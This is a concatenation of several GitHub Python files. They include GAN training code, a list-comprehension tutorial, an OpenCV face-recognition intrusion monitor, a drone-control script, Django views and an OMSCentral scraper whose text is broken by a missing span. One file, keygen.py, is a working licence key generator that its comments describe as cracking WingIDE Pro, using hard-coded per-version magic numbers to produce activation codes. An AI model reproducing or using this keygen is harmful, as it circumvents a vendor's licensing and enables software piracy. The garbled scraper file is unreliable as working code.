data[2].to(device)\n # output = torch.clamp(output + mask, max=1) # no need for true label (since all is 1)\n\n # Calculate loss on all-real batch\n # error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n # summed_by_img = torch.sum(error, dim=(1,2))\n # non_zero = torch.count_nonzero(mask, (1,2))\n # errD_real = torch.mean(summed_by_img/non_zero)\n\n errD_real = criterion(output, label, mask)\n # Calculate gradients for D in backward pass\n errD_real.backward()\n D_x = output.mean().item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n # noise = torch.randn(b_size, nz, 1, 1, device=device)\n # Generate fake image batch with G\n \n fake = netG(real_data)\n label.fill_(fake_label)\n\n # Classify all fake batch with D\n output = netD(fake.detach(), real_data).view(b_size,256,256)\n\n # Calculate D's loss on the all-fake batch\n # error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n # summed_by_img = torch.sum(error, dim=(1,2))\n # non_zero = torch.count_nonzero(mask, (1,2))\n # errD_fake = torch.mean(summed_by_img/non_zero)\n\n errD_fake = criterion(output, label, mask)\n\n # Calculate the gradients for this batch, accumulated (summed) with previous gradients\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n # Compute error of D as sum over the fake and the real batches\n errD = errD_real + errD_fake\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n \n # add mask to labels\n # label = torch.clamp(label + mask, max=1) # no need all is already 1\n\n # Since we just updated D, perform another forward pass of all-fake batch through D\n output = netD(fake, real_data).view(b_size,256,256)\n\n # Calculate G's loss based on this output\n errG = criterion(output, label, mask)\n\n # error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n # summed_by_img = torch.sum(error, dim=(1,2))\n # non_zero = torch.count_nonzero(mask, (1,2))\n # errG = torch.mean(summed_by_img/non_zero)\n\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = output.mean().item()\n # Update G\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f'\n % (epoch, num_epochs, i, len(train_dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs-1) and (i == len(train_dataloader)-1)):\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n\n iters += 1\n\n #PLOT\n plt.figure(figsize=(10,5))\n plt.title(\"Generator and Discriminator Loss During Training\")\n plt.plot(G_losses,label=\"G\")\n plt.plot(D_losses,label=\"D\")\n plt.xlabel(\"iterations\")\n plt.ylabel(\"Loss\")\n plt.legend()\n plt.savefig(os.path.join(output_dir, 'losses'))\n plt.show()\n\n for i in range(len(img_list)):\n fig = plt.figure(figsize=(8,8))\n plt.axis(\"off\")\n plt.imshow(np.transpose(img_list[i],(1,2,0)))\n plt.title(\"Generated Albedo\")\n plt.savefig(os.path.join(output_dir, 'gen-albedo-{}'.format(i)))\n plt.show()\n\n\n ex = 
real_batch[1]\n plt.figure(figsize=(8,8))\n plt.axis(\"off\")\n plt.title(\"Original Shadeless Images\")\n plt.imshow(np.transpose(vutils.make_grid(ex, padding=2, normalize=True).cpu(),(1,2,0)))\n plt.savefig(os.path.join(output_dir, 'original-albedo'))\n\n # Plot some training images\n ex = real_batch[0]\n plt.figure(figsize=(8,8))\n plt.axis(\"off\")\n plt.title(\"Original Rendered Images\")\n plt.imshow(np.transpose(vutils.make_grid(ex, padding=2, normalize=True).cpu(),(1,2,0)))\n plt.savefig(os.path.join(output_dir, 'rendered'))","repo_name":"giuseppefrn/PixelwiseColourSpecification","sub_path":"siamese-pixelwise.py","file_name":"siamese-pixelwise.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2566185955","text":"#!/usr/bin/env python3\nimport argparse\nfrom textwrap import dedent\n\np = parser = argparse.ArgumentParser(description=dedent('''\n Create an image for whatsapp\n ''').strip('\\n'))\n\np.add_argument(\"files\", nargs='+')\np.add_argument(\"--out\", \"-o\", nargs='+')\np.add_argument(\"-b\", '--background', default=None)\np.add_argument(\"-v\", \"--verbose\", action='store_true')\n\nargs = parser.parse_args()\n\ndef parse_color(string):\n \"\"\"\n >>> parse_color('#ffcc99') == (0xff, 0xcc, 0x99)\n True\n \"\"\"\n assert string.startswith('#')\n assert len(string) in (6+1, 8+1)\n return tuple(int(string[1+i:1+i+2], base=16)\n for i in range(len(string) // 2))\n\ndef new_name(x):\n import os\n from itertools import count, filterfalse\n splitext = os.path.splitext\n a,b = splitext(x)\n\n def first_not_exists(x):\n return next(filterfalse(os.path.exists, x))\n\n return first_not_exists('{}__{}{}'.format(a, i, b)\n for i in count(1))\n\nif args.out:\n assert len(args.files) == len(args.out)\nelse:\n args.out = list(map(new_name, args.files))\n\n\nfrom PIL import Image\nfor filename, out_filename in zip(args.files, args.out):\n im = Image.open(filename)\n bcolor = im.getpixel((0,0)) if not args.background else parse_color(args.background)\n real_background_color = bcolor[:len(im.mode)]\n out = Image.new(im.mode, (max(im.size), max(im.size)), real_background_color)\n position = ((im.size[0] // 2, 0) if im.size[0] < im.size[1] else \n (0, im.size[1] // 2))\n out.paste(im, position)\n out.save(out_filename)\n\n if args.verbose:\n print('Created', out_filename)\n\n","repo_name":"robertvandeneynde/python","sub_path":"whatsappify.py","file_name":"whatsappify.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"12840129856","text":"import os\nimport string\nimport random\nimport hashlib\nimport platform\npy_version = platform.python_version()\nif py_version[0] != '3':\n print(\"Can't run under python2 env ! 
please run tool under python 3.2 or later version !\")\n os.system(\"pause\")\n os._exit(0)\n# GUI Import\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n \nBASE16 = '0123456789ABCDEF'\nBASE30 = '123456789ABCDEFGHJKLMNPQRTVWXY'\n \n \ndef RandomString(size=20, chars=string.ascii_uppercase + string.digits):\n return ''.join((random.choice(chars) for _ in range(size)))\n \n \ndef BaseConvert(number, fromdigits, todigits, ignore_negative=True):\n if not ignore_negative and str(number)[0] == '-':\n number = str(number)[1:]\n neg = 1\n else:\n neg = 0\n x = 0\n for digit in str(number):\n x = x * len(fromdigits) + fromdigits.index(digit)\n \n res = ''\n while x > 0:\n digit = x % len(todigits)\n res = todigits[digit] + res\n x //= len(todigits)\n \n if neg:\n res = '-' + res\n return res\n \n \ndef AddHyphens(code):\n return code[:5] + '-' + code[5:10] + '-' + code[10:15] + '-' + code[15:]\n \n \ndef SHAToBase30(digest):\n tdigest = ''.join([c for i, c in enumerate(digest) if i // 2 * 2 == i])\n result = BaseConvert(tdigest, BASE16, BASE30)\n while len(result) < 17:\n result = '1' + result\n return result\n \n \ndef loop(ecx, lichash):\n part = 0\n for c in lichash:\n part = ecx * part + ord(c) & 1048575\n return part\n \ng_version_list = ('9.0.4','8.X.X', '7.X.X', '6.X.X', '5.X.X')\ng_version_magics = {\n '5.X.X': [7, 123, 23, 87],\n '6.X.X': [23, 161, 47, 9],\n '7.X.X': [221, 13, 93, 27],\n '8.X.X': [179, 95, 45, 245],\n '9.0.4': [123, 17, 42, 7],\n}\n \n \ndef CalcActivationCode(args):\n if not isinstance(args, Application):\n return\n # # Generate License ID\n # licenseID = AddHyphens('CN' + RandomString(18, '123456789ABCDEFGHJKLMNPQRTVWXY'))\n licenseID = args.LicID.get()\n print ('License id: ' + licenseID)\n \n #requestCode = input('Enter request code:')\n requestCode = args.ReqCode.get()\n if requestCode.strip() == '':\n messagebox.showerror(\"Hints\", \"Please input the Request Code !\")\n return \n # # SHA1\n shaHasher = hashlib.sha1()\n shaHasher.update(requestCode.encode('utf-8'))\n shaHasher.update(licenseID.encode('utf-8'))\n hashResult = shaHasher.hexdigest().upper()\n lichash = AddHyphens(requestCode[:3] + SHAToBase30(hashResult))\n \n versionMagic = None\n # Supported crack WingIDE Pro version list : 5.x.x, 6.x.x, 7.x.x\n wingIDEProVerStr = args.VersionInfo.get()\n print ('Cracking WingIDE Version : ' + wingIDEProVerStr)\n if wingIDEProVerStr in g_version_magics.keys():\n versionMagic = g_version_magics[wingIDEProVerStr]\n if versionMagic:\n activationCode = format(loop(versionMagic[0], lichash), '05x') + \\\n format(loop(versionMagic[1], lichash), '05x') + \\\n format(loop(versionMagic[2], lichash), '05x') + \\\n format(loop(versionMagic[3], lichash), '05x')\n pass\n else:\n print('Get wrong WingIDE version, exit...')\n os._exit(0)\n activationCode = BaseConvert(activationCode.upper(), BASE16, BASE30)\n while len(activationCode) < 17:\n activationCode = '1' + activationCode\n \n activationCode = AddHyphens('AXX' + activationCode)\n print ('Activation code: ' + activationCode)\n args.ActCode.set(activationCode)\n pass\n \n \nclass Application(Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.master.title('WingIDE Pro Keygen(5, 6, 7)')\n self.master.geometry('350x180')\n self.create_widgets()\n pass\n \n def create_widgets(self):\n current_row = 0\n current_col = 0\n \n # Version Info\n self.l0 = Label(self.master, text='WingIDE Pro :')\n self.l0.grid(padx=5, pady=5, row=current_row, 
column=current_col)\r\n        self.VersionInfo = StringVar()\r\n        self.versionComb = ttk.Combobox(self.master, textvariable=self.VersionInfo, state='readonly')\r\n        self.versionComb['values'] = g_version_list\r\n        self.versionComb.grid(padx=5, pady=1, row=current_row, column=current_col + 1)\r\n        self.versionComb.current(0)\r\n        current_row += 1\r\n \r\n        # License ID info\r\n        self.l1 = Label(self.master, text='LicenseID:')\r\n        self.l1.grid(padx=5, pady=5, row=current_row, column=current_col)\r\n        self.LicID = StringVar()\r\n        self.LicEntry = Entry(self.master, textvariable=self.LicID, width=30, state='readonly')\r\n        self.LicEntry.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\r\n        self.LicID.set(AddHyphens('CN' + RandomString(18, '123456789ABCDEFGHJKLMNPQRTVWXY')))\r\n        current_row += 1\r\n \r\n        # Request code info\r\n        self.l2 = Label(self.master, text='RequestCode:')\r\n        self.l2.grid(padx=5, pady=5, row=current_row, column=current_col)\r\n        self.ReqCode = StringVar()\r\n        self.ReqcodeEntry = Entry(self.master, textvariable=self.ReqCode, width=30)\r\n        self.ReqcodeEntry.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\r\n        current_row += 1\r\n \r\n        # Activation code info\r\n        self.l3 = Label(self.master, text='ActivationCode:')\r\n        self.l3.grid(padx=5, pady=5, row=current_row, column=current_col)\r\n        self.ActCode = StringVar()\r\n        # separate widget attribute so the request-code entry is not overwritten\r\n        self.ActcodeEntry = Entry(self.master, textvariable=self.ActCode, width=30, state='readonly')\r\n        self.ActcodeEntry.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\r\n        current_row += 1\r\n \r\n        self.btn_Calc = Button(self.master)\r\n        self.btn_Calc['text'] = 'Generate'\r\n        self.btn_Calc['command'] = lambda: CalcActivationCode(self)\r\n        self.btn_Calc.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\r\n \r\n \r\nif __name__ == '__main__':\r\n    root = Tk()\r\n    #\r\n    app = Application(master=root)\r\n    app.mainloop()\r\n","repo_name":"sfc9982/WingProKeygen","sub_path":"keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20711995214","text":"import random\r\n#List comprehension - create new list from current list\r\n    #would currently do this via loop and list.append()\r\n\r\n#list comprehension pseudo code below\r\n#new_list = [new_item for item in list]\r\n\r\nimport pandas\r\n\r\nnumbers = [1, 2, 3]\r\nnew_list = []\r\nfor n in numbers:\r\n    add_1 = n + 1\r\n    new_list.append(add_1)\r\n\r\n#instead w/ list comprehension -\r\n\r\nnew_list2 = [n+1 for n in numbers]\r\n#new_list = [new_item for item in list] ^\r\nprint(new_list2)\r\n\r\nname = \"gravytas\"\r\nletter_list = [x for x in name]\r\nprint(letter_list)\r\n\r\nnumber_list = [x*2 for x in range(1,5)]\r\nprint(number_list)\r\n\r\n#conditional list comprehension\r\n#new_list = [new_item for item in list if test]\r\n\r\nnames = [\"Alex\", \"Beth\", \"Caroline\", \"Dave\", \"Eleanor\", \"Freddie\"]\r\nshort_names = [x for x in names if len(x)<5]\r\nprint(short_names)\r\n\r\nlong_names = [name.upper() for name in names if len(name)>4]\r\nprint(long_names)\r\n\r\n#PRACTICE WITH LIST COMPREHENSION\r\n#Exercise 1 - square each number in numbers2 list\r\nnumbers2 = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\r\nsquared_nums = [num**2 for num in numbers2]\r\nprint(squared_nums)\r\n\r\n#Exercise 2 - create new list with only even numbers from numbers2\r\nevens = [num for num in numbers2 if num%2==0]\r\nprint(evens)\r\n
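\r\n#Bonus (illustrative) - comprehensions can also nest; flatten a list of lists in one pass\r\nmatrix = [[1, 2], [3, 4], [5, 6]]\r\nflat = [value for row in matrix for value in row]\r\nprint(flat) #[1, 2, 3, 4, 5, 6]\r\n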
\r\n#Exercise 3 - pull numbers from file1.txt and file2.txt and dedupe into one list\r\nwith open(\"./Scripts/file1.txt\") as file1:\r\n    data1 = file1.readlines()\r\n    data1_list = [x.strip() for x in data1]\r\n    print(data1_list)\r\n\r\nwith open(\"./Scripts/file2.txt\") as file2:\r\n    data2 = file2.readlines()\r\n    data2_list = [x.strip() for x in data2]\r\n    print(data2_list)\r\n\r\nduplicates = [int(x) for x in data1_list if x in data2_list]\r\nprint(duplicates)\r\n\r\n###Dictionary comprehension\r\n# new_dict = {new_key:new_value for item in list}\r\n# new_dict2 = {new_key:new_value for (key, value) in dict.items()}\r\n# new_dict3 = {new_key:new_value for (key, value) in dict.items() if test}\r\n\r\nname = {'Tom', 'Beth', 'Chloe', 'Jake', 'James'}\r\nstudent_scores = {student:random.randint(1,100) for student in name}\r\nprint(student_scores)\r\n\r\n#pull students with grade over 60 from created dict above\r\npassed_students = {student:score for (student,score) in student_scores.items() if score>=60}\r\nprint(passed_students)\r\n\r\n#practice with dictionary comprehension; count number of letters in each word and create dictionary\r\n\r\nimport re\r\nsentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\r\nwordList = re.sub(\"[^\\w]\", \" \", sentence).split()\r\n\r\nresult = {word:len(word) for word in wordList}\r\nprint(result)\r\n\r\n#take each temp in celsius and convert to fahrenheit\r\nweather_c = {\r\n    \"monday\": 12,\r\n    \"tuesday\": 14,\r\n    \"wednesday\": 15,\r\n    \"thursday\": 14,\r\n    \"friday\": 21,\r\n    \"saturday\": 22,\r\n    \"sunday\": 24\r\n}\r\nweather_f = {day:round((temp * (9/5) +32),1) for (day,temp) in weather_c.items()}\r\nprint(weather_f)\r\n\r\nstudent_dict = {\r\n    \"student\": [\"Angela\", \"James\", \"Lilly\"],\r\n    \"score\": [56, 76, 99]\r\n}\r\n\r\nfor (key, value) in student_dict.items():\r\n    print(key)\r\n    print(value)\r\n\r\nimport pandas\r\nstudent_dataframe = pandas.DataFrame(student_dict)\r\nprint(student_dataframe)\r\n\r\n#loop through data frame\r\nfor (key,value) in student_dataframe.items():\r\n    print(value)\r\n\r\n#loop through rows of dataframe\r\nfor (index, row) in student_dataframe.iterrows():\r\n    print(row.student)\r\n    print(row.score)\r\n    if row.student == \"Angela\":\r\n        print(row.score)\r\n\r\n\r\n\r\n#Challenge\r\n#1 create a dictionary in this format: {\"A\":\"alpha\", \"B\":\"bravo\", ...}\r\ndata5 = pandas.read_csv(\"phonetic.csv\")\r\nphon_dict = {row.Letter:row.Word for (index,row) in data5.iterrows()}\r\n\r\n#2 create a list of the phonetic words used for a given word\r\nword = input(\"Choose a word to create a code: \").upper()\r\ncode_output = [phon_dict[letter] for letter in word]\r\nprint(code_output)","repo_name":"gravytas/python-bootcamp","sub_path":"Python Bootcamp Day 0026_List Comprehension and Phonetic Alphabet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11067040674","text":"import os\r\nimport sys\r\nimport uuid\r\nimport cv2\r\nfrom cv2 import getStructuringElement\r\n\r\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\r\nrecognizer.read('D:/test/face_trainer/trainer.yml')\r\n\r\n
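# Note: the LBPH confidence returned by predict() is a distance, so lower values\r\n# mean a closer match; imageClassification below treats anything under 68 as a known face.\r\n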
def imageClassification(video_path, names):\r\n    # whether an intrusion happened; if so, a video gets recorded\r\n    invade = False\r\n    isHaveMovingObject = False # whether a moving object has been detected\r\n    # model paths (the model files need to be downloaded first)\r\n    model_bin = \"D:/ssd/MobileNetSSD_deploy.caffemodel\"\r\n    config_text = \"D:/ssd/MobileNetSSD_deploy.prototxt\"\r\n\r\n    # class labels\r\n    objName = [\"background\",\r\n               \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\r\n               \"bottle\", \"bus\", \"car\", \"cat\", \"chair\",\r\n               \"cow\", \"diningtable\", \"dog\", \"horse\",\r\n               \"motorbike\", \"person\", \"pottedplant\",\r\n               \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\r\n\r\n    # load the detection model\r\n    net = cv2.dnn.readNetFromCaffe(config_text, model_bin)\r\n    # use OpenCV's bundled face-detection cascade\r\n    face_classifier = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml')\r\n    cap = cv2.VideoCapture(video_path)#\"D:/example video.avi\"\r\n    fgbg = cv2.createBackgroundSubtractorMOG2()\r\n    kernel = getStructuringElement(cv2.MORPH_RECT, (3, 3), (-1, -1))\r\n    # the video failed to open\r\n    if not cap.isOpened():\r\n        print(\"Could not open video\")\r\n        sys.exit()\r\n\r\n    vw = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # width\r\n    vh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # height\r\n    fps = cap.get(cv2.CAP_PROP_FPS) # frame rate\r\n\r\n    fileName = \"D:/test/video\" + str(uuid.uuid4()) + \".mp4\" # file name of the saved video\r\n    out = cv2.VideoWriter(fileName, cv2.CAP_ANY, int(cap.get(cv2.CAP_PROP_FOURCC)), fps, (int(vw), int(vh)), True) # writer that saves the video\r\n    while True:\r\n        ret, image = cap.read() # read one frame of the video\r\n\r\n        # reading the frame failed\r\n        if not ret:\r\n            print('Cannot read video file')\r\n            sys.exit()\r\n\r\n        (h, w) = image.shape[:2]\r\n        # convert the frame to grayscale (VideoCapture frames are BGR)\r\n        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n        fgmask = fgbg.apply(image)\r\n        dilate = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel)\r\n        cnts, hierarchy = cv2.findContours(dilate.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]\r\n\r\n        for c in cnts:\r\n            if isHaveMovingObject:\r\n                break\r\n            (x, y, w, h) = cv2.boundingRect(c)  # bounding box of the contour\r\n            if cv2.contourArea(c) < 2000:  # contour area\r\n                continue\r\n            elif w<30 or h<30:\r\n                continue\r\n            isHaveMovingObject = True\r\n\r\n        # if there is a moving object, run object detection\r\n        if isHaveMovingObject:\r\n            blobImage = cv2.dnn.blobFromImage(image, 0.007843, (300, 300), (127.5, 127.5, 127.5), True, False)\r\n            net.setInput(blobImage)\r\n            cvOut = net.forward()\r\n\r\n            for detection in cvOut[0, 0, :, :]:\r\n                score = float(detection[2])\r\n                objIndex = int(detection[1])\r\n                if score > 0.6:\r\n                    left = detection[3]*w\r\n                    top = detection[4]*h\r\n                    right = detection[5]*w\r\n                    bottom = detection[6]*h\r\n\r\n                    # draw the detection\r\n                    cv2.rectangle(image, (int(left), int(top)), (int(right), int(bottom)), (0, 0, 255), thickness=2)\r\n                    cv2.putText(image, \"score:%.2f, %s\"%(score, objName[objIndex]),\r\n                        (int(left) - 10, int(top) - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2, 8)\r\n                    invade = True\r\n\r\n        # face recognition\r\n        face = face_classifier.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=2, minSize=(24, 24))\r\n        for (x, y, w, h) in face:\r\n            cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n            idnum, confidence = recognizer.predict(gray[y:y + h, x:x + w])\r\n            if confidence < 68: # a distance below 68 means this is very likely the enrolled person\r\n                name = names[idnum]\r\n                print(idnum)\r\n                confidence = \"{0}%\".format(round(100 - confidence))\r\n            else:\r\n                name = \"unknown\"\r\n                print(confidence)\r\n                print(idnum)\r\n                confidence = \"{0}%\".format(round(100 - confidence))\r\n\r\n            cv2.putText(image, name, (x + 5, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1)\r\n            cv2.putText(image, str(confidence), (x + 5, y + h - 5), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\r\n\r\n        # if someone intruded, record the video\r\n        if invade:\r\n            out.write(image)\r\n        # display\r\n        cv2.imshow('demo', image)\r\n\r\n        k = cv2.waitKey(100)& 0xff\r\n        # 27 is Esc; exit when it is pressed\r\n        if k == 27:\r\n            break\r\n        elif k == 32:\r\n            while cv2.waitKey(0) != 32:\r\n                cv2.waitKey(0)\r\n\r\n    cap.release()\r\n    cv2.destroyAllWindows()\r\n\r\n
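# findName assumes training photos are named like <id>#<name>#<index>.jpg\r\n# (hypothetical example: 0#Alice#1.jpg); it takes the text between the first\r\n# and second # as the person's name.\r\n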
# get the names\r\ndef findName(path):\r\n    imagePaths = [os.path.join(path, f) for f in os.listdir(path)]  # every file path under the training-photo folder\r\n    names = []\r\n    for imagePath in imagePaths:\r\n        name = os.path.split(imagePath)[-1].split(\"#\")[1]\r\n        if name in names:\r\n            continue\r\n        else:\r\n            names.append(name)\r\n    #names.reverse()\r\n    return names\r\n\r\n\r\nif __name__ == '__main__':\r\n    path = 'D:/test/face'\r\n    print(findName(path))\r\n    names = findName(path)\r\n    video_path = 0#\"E:/demo.mp4\"#\"D:/example video.avi\"#\"D:/test2.mp4\"\r\n    imageClassification(video_path, names)\r\n","repo_name":"106teamChangZihan/Monitor-System","sub_path":"intrusionDetection.py","file_name":"intrusionDetection.py","file_ext":"py","file_size_in_byte":5686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36603893938","text":"# libraries for webscraping, parsing and getting data\nfrom urllib.request import urlopen, Request\nfrom bs4 import BeautifulSoup\nimport json\nimport time\n\n# for plotting and data manipulation\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly\nimport plotly.express as px\n\n# for getting current date and time to print 'last updated' in webpage\nfrom datetime import datetime\n\n# Filter data with minimum review count of 5\nmin_review_count = 5\n\n# Scrape the Course Reviews Data from OMS Central\nurl = 'https://www.omscentral.com/'\n\nreq = Request(url=url,headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0'})\n\ntry:\n    response = urlopen(req) \nexcept Exception:\n    time.sleep(10) # if there is an error and request is blocked, do it more slowly by waiting for 10 seconds before requesting again\n    response = urlopen(req) \n    \n# Read the contents of the file into 'html'\nhtml = BeautifulSoup(response, 'html.parser')\n\n# Parse the Course Reviews Data into a Python List\n# Find the data in between the final \"<script>\" and \"</script>\" tags\n    description = \"The data is pulled from OMSCentral daily via a GitHub Actions script to update the summary information in this page. \"\n    credits = \"Credits to OMSCentral for the information, review and rating of the courses. I do not own any of this data.\"\n    subtitle = \"Explanation and Source Code\"\n    code = \"\"\"Explanatory Article | Source Code\"\"\"\n    author = \"\"\" | Created by Damian Boh, check out my GitHub Page\"\"\"\n    f.write(title + updated + current_time + description + credits + subtitle + code + author)\n    f.write(fig_scatter1.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    f.write(fig_scatter2.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    f.write(fig_treemap1.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    f.write(fig_treemap2.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    \n    # if the lines below are uncommented, remember to uncomment the lines above that create these plots\n    # f.write(fig_hist1.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    # f.write(fig_hist2.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    # f.write(fig_hist3.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n    \n    f.write(fig_corr.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n","repo_name":"damianboh/gatech_omscs_live_rating_reviews_plot","sub_path":"update_page_no_semester.py","file_name":"update_page_no_semester.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"35100904748","text":"# Import mavutil\nfrom pymavlink import mavutil\nimport time\n\ntime.sleep(10)\n\n# create the connection\nmaster = mavutil.mavlink_connection(\n    '/dev/ttyACM0',\n    baud=115200)# so the Raspberry Pi can talk to the Pixhawk\n\nmaster.wait_heartbeat()\nmode = 'MANUAL'\n\nmode_id = master.mode_mapping()[mode]\n\nmaster.set_mode(mode_id)\n\nmaster.arducopter_arm()\ngit = 0\nwhile(True):\n    git += 1\n    if(5000 > git):\n        # MANUAL_CONTROL takes (target, x, y, z, r, buttons): drive the z axis\n        # and leave the other axes and buttons neutral\n        master.mav.manual_control_send(\n            master.target_system,\n            0,\n            0,\n            -500,\n            0,\n            0)\n        print(git)\n    else:\n        master.arducopter_disarm()\n        break\n\n","repo_name":"KtunYazgit/Barbarov","sub_path":"Software/2021Pixhawk/jetsonnano2.py","file_name":"jetsonnano2.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28546754760","text":"import json\nimport os.path\nimport random\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom basketapp.models import Basket\nfrom mainapp.models import ProductCategory, Product\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.views.decorators.cache import never_cache\nfrom django.template.loader import render_to_string\nfrom django.views.decorators.cache import cache_page\nfrom django.http import JsonResponse\n\n# Create your views here.\n\n\nJSON_PATH = 'mainapp/json'\n\n\ndef get_links_menu():\n    if settings.LOW_CACHE:\n        key = 'links_menu'\n        links_menu = cache.get(key)\n        if links_menu is None:\n            links_menu = ProductCategory.objects.filter(is_active=True)\n            cache.set(key, links_menu)\n        return links_menu\n    else:\n        return ProductCategory.objects.filter(is_active=True)\n\n\ndef get_category(pk):\n    if settings.LOW_CACHE:\n        key = f'category_{pk}'\n        category = cache.get(key)\n        if category is None:\n            category = get_object_or_404(ProductCategory, pk=pk)\n            cache.set(key, category)\n        return category\n    
else:\n return get_object_or_404(ProductCategory, pk=pk)\n\n\ndef get_products():\n if settings.LOW_CACHE:\n key = 'products'\n products = cache.get(key)\n if products is None:\n products = Product.objects.filter(is_active=True, \\\n category__is_active=True).select_related('category')\n cache.set(key, products)\n return products\n else:\n return Product.objects.filter(is_active=True, \\\n category__is_active=True).select_related('category')\n\n\ndef get_product(pk):\n if settings.LOW_CACHE:\n key = f'product_{pk}'\n product = cache.get(key)\n if product is None:\n product = get_object_or_404(Product, pk=pk)\n cache.set(key, product)\n return product\n else:\n return get_object_or_404(Product, pk=pk)\n\n\ndef get_products_orederd_by_price():\n if settings.LOW_CACHE:\n key = 'products_orederd_by_price'\n products = cache.get(key)\n if products is None:\n products = Product.objects.filter(is_active=True, \\\n category__is_active=True).order_by('price')\n cache.set(key, products)\n return products\n else:\n return Product.objects.filter(is_active=True, \\\n category__is_active=True).order_by('price')\n\n\ndef get_products_in_category_orederd_by_price(pk):\n if settings.LOW_CACHE:\n key = f'products_in_category_orederd_by_price_{pk}'\n products = cache.get(key)\n if products is None:\n products = Product.objects.filter(category__pk=pk, is_active=True, \\\n category__is_active=True).order_by('price')\n cache.set(key, products)\n return products\n else:\n return Product.objects.filter(category__pk=pk, is_active=True, \\\n category__is_active=True).order_by('price')\n\n\ndef load_from_json(file_name):\n with open(os.path.join(JSON_PATH, file_name + '.json'), 'r') as infile:\n return json.load(infile)\n\n\ndef get_basket(user):\n if user.is_authenticated:\n return Basket.objects.filter(user=user)\n else:\n return []\n\n\ndef get_hot_product():\n products = Product.objects.all()\n return random.sample(list(products), 1)[0]\n\n\ndef get_same_products(hot_product):\n same_products = Product.objects.filter(category=hot_product.category).exclude(pk=hot_product.pk)[:3]\n return same_products\n\n\n# links_menu = [\n# {'href': 'products_all', 'name': 'Все'},\n# {'href': 'products_home', 'name': 'Дом'},\n# {'href': 'products_office', 'name': 'Офис'},\n# {'href': 'products_modern', 'name': 'Модерн'},\n# {'href': 'products_classic', 'name': 'Классика'},\n# ]\n\nmain_menu = [\n {'menu_section': 'index', 'main_urls': 'index', 'name': 'Главная'},\n {'menu_section': 'products:index', 'main_urls': 'products', 'name': 'Продукты'},\n {'menu_section': 'contact', 'main_urls': 'contact', 'name': 'Контакты'},\n]\n\nmodule_dir = os.path.dirname(__file__)\n\n\ndef index(request):\n products = (Product.objects.all().select_related('category')[:3])\n content = {\n 